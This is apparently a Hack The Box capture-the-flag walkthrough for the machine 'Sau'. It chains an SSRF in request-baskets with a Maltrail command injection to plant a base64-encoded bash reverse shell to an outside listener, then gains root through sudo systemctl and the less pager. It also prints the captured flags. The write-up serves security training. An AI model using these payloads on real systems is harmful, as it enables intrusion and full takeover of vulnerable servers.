<- HTB

Sau


6 minutes to read

Sau
Hack The Box. Linux. Easy machine. This machine has a web application that is vulnerable to SSRF, which can be used to read the contents of an internal server, which is vulnerable to command injection. The two vulnerabilities can be chained to get RCE on the machine. The low-privileged user is able to run systemctl as root using sudo, which leads to the privilege escalation via the default pager less
  • OS: Linux
  • Difficulty: Easy
  • IP Address: 10.10.11.224
  • Release: 08 / 07 / 2023

Port scanning

# Nmap 7.94 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.11.224 -p 22,80,8338,55555
Nmap scan report for 10.10.11.224
Host is up (0.073s latency).

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Tue, 11 Jul 2023 00:20:29 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:  
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Tue, 11 Jul 2023 00:20:01 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Tue, 11 Jul 2023 00:20:02 GMT
|_    Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 96.81 seconds

This machine has ports 22 (SSH) and 55555 (HTTP) open. Ports 80 (HTTP) and 8338 are filtered.

Enumeration

If we go to http://10.10.11.224:55555, we will see this web application:

Sau 1

The footer shows that the web application is request-baskets (Version: 1.2.1). If we research on these application, we can find that it is vulnerable to Server-Side Request Forgery (SSRF).

Server-Side Request Forgery

The vulnerability is disclosed in this GitHub Gist, and explained here.

Basically, we need to add a setting for “Forward URL” in the API. This can also be done from the UI (after creating a basket):

Sau 2

Sau 3

We are interested in reading what is on port 80, so we will put http://127.0.0.1 to make a GET request to that endpoint:

Sau 4

Now, if we access our basket, the response will be proxied to http://127.0.0.1. Therefore, we can read the response from the server on port 80:

Sau 5

Command injection

In the response to http://127.0.0.1 we can see Maltrail (v0.53). Again, this version has a vulnerability, which is command injection. Here we can see why it is vulnerable and a simple payload to exploit it:

curl 'http://hostname:8338/login' --data 'username=;`id > /tmp/bbq`'

Instead of using a POST request, we can add the username parameter as a query parameter for a GET request.

Foothold

We will go straight and execute a reverse shell:

$ echo -n 'bash  -i >& /dev/tcp/10.10.17.44/4444 0>&1' | base64  
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx

We will enter this for “Forward URL”:

http://127.0.0.1/login?username=;`echo+YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx+|+base64+-d+|+bash

Sau 6

Now, we can start listening with nc and then access the basket to trigger the reverse shell:

$ nc -nlvp 4444
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.224:42122.
bash: cannot set terminal process group (885): Inappropriate ioctl for device  
bash: no job control in this shell
puma@sau:/opt/maltrail$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
puma@sau:/opt/maltrail$ ^Z
zsh: suspended  ncat -nlvp 4444

$ stty raw -echo; fg
[1]  + continued  ncat -nlvp 4444
                                 reset xterm
puma@sau:/opt/maltrail$ export TERM=xterm
puma@sau:/opt/maltrail$ export SHELL=bash
puma@sau:/opt/maltrail$ stty rows 50 columns 158

We are in!

System enumeration

At this point, we can read the user.txt flag:

puma@sau:/opt/maltrail$ cd
puma@sau:~$ cat user.txt
65283d8723a45f2e23b5ef238b3fd53c

Moreover, we have sudo permissions as user puma, without password:

puma@sau:~$ sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin  

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

We can use systemctl to read the status of trail.service:

puma@sau:~$ sudo systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
     Active: active (running) since Mon 2023-07-10 22:43:59 UTC; 1h 57min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 885 (python3)
      Tasks: 11 (limit: 4662)
     Memory: 22.4M
     CGroup: /system.slice/trail.service
             β”œβ”€ 885 /usr/bin/python3 server.py
             β”œβ”€1208 /bin/sh -c logger -p auth.info -t "maltrail[885]" "Failed password for ;`echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | >  
             β”œβ”€1209 /bin/sh -c logger -p auth.info -t "maltrail[885]" "Failed password for ;`echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | >
             β”œβ”€1217 bash
             β”œβ”€1218 bash -i
             β”œβ”€1225 script /dev/null -c bash
             β”œβ”€1226 bash
             β”œβ”€1238 sudo systemctl status trail.service
             β”œβ”€1240 systemctl status trail.service
             └─1241 pager

Jul 10 22:43:59 sau systemd[1]: Started Maltrail. Server of malicious traffic detection system.
Jul 11 00:40:58 sau sudo[1236]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=root ; COMMAND=list
Jul 11 00:41:36 sau sudo[1238]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=root ; COMMAND=/usr/bin/systemctl status trail.service
Jul 11 00:41:36 sau sudo[1238]: pam_unix(sudo:session): session opened for user root by (uid=0)
lines 1-24/24 (END)

Privilege escalation

This command is in GTFOBins, and it can be abused with sudo to obtain a shell as root. We can use my tool gtfobins-cli to obtain information on how to escalate privileges with systemctl and sudo:

$ gtfobins-cli --sudo systemctl

systemctl ==> https://gtfobins.github.io/gtfobins/systemctl/


Sudo

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.  

TF=$(mktemp)
echo /bin/sh >$TF
chmod +x $TF
sudo SYSTEMD_EDITOR=$TF systemctl edit system.slice

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF

This invokes the default pager, which is likely to be less, other functions may apply.

sudo systemctl
!sh

As can be seen, the output of systemctl uses less, so we can use !sh to obtain a shell, as simple as that. Since we are executing it with sudo the shell is executed as the root user:

puma@sau:~$ sudo systemctl status trail.service
● trail.service - Maltrail. Server of malicious traffic detection system
     Loaded: loaded (/etc/systemd/system/trail.service; enabled; vendor preset: enabled)
     Active: active (running) since Mon 2023-07-10 22:43:59 UTC; 1h 57min ago
       Docs: https://github.com/stamparm/maltrail#readme
             https://github.com/stamparm/maltrail/wiki
   Main PID: 885 (python3)
      Tasks: 11 (limit: 4662)
     Memory: 22.4M
     CGroup: /system.slice/trail.service
             β”œβ”€ 885 /usr/bin/python3 server.py
             β”œβ”€1208 /bin/sh -c logger -p auth.info -t "maltrail[885]" "Failed password for ;`echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | >  
             β”œβ”€1209 /bin/sh -c logger -p auth.info -t "maltrail[885]" "Failed password for ;`echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | >
             β”œβ”€1217 bash
             β”œβ”€1218 bash -i
             β”œβ”€1225 script /dev/null -c bash
             β”œβ”€1226 bash
             β”œβ”€1238 sudo systemctl status trail.service
             β”œβ”€1240 systemctl status trail.service
             └─1241 pager

Jul 10 22:43:59 sau systemd[1]: Started Maltrail. Server of malicious traffic detection system.
Jul 11 00:40:58 sau sudo[1236]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=root ; COMMAND=list
Jul 11 00:41:36 sau sudo[1238]:     puma : TTY=pts/0 ; PWD=/home/puma ; USER=root ; COMMAND=/usr/bin/systemctl status trail.service
Jul 11 00:41:36 sau sudo[1238]: pam_unix(sudo:session): session opened for user root by (uid=0)
!sh
# whoami
root
# bash
root@sau:/home/puma# cd
root@sau:~# cat root.txt
9b91dc59c88ce80907646fd59050541b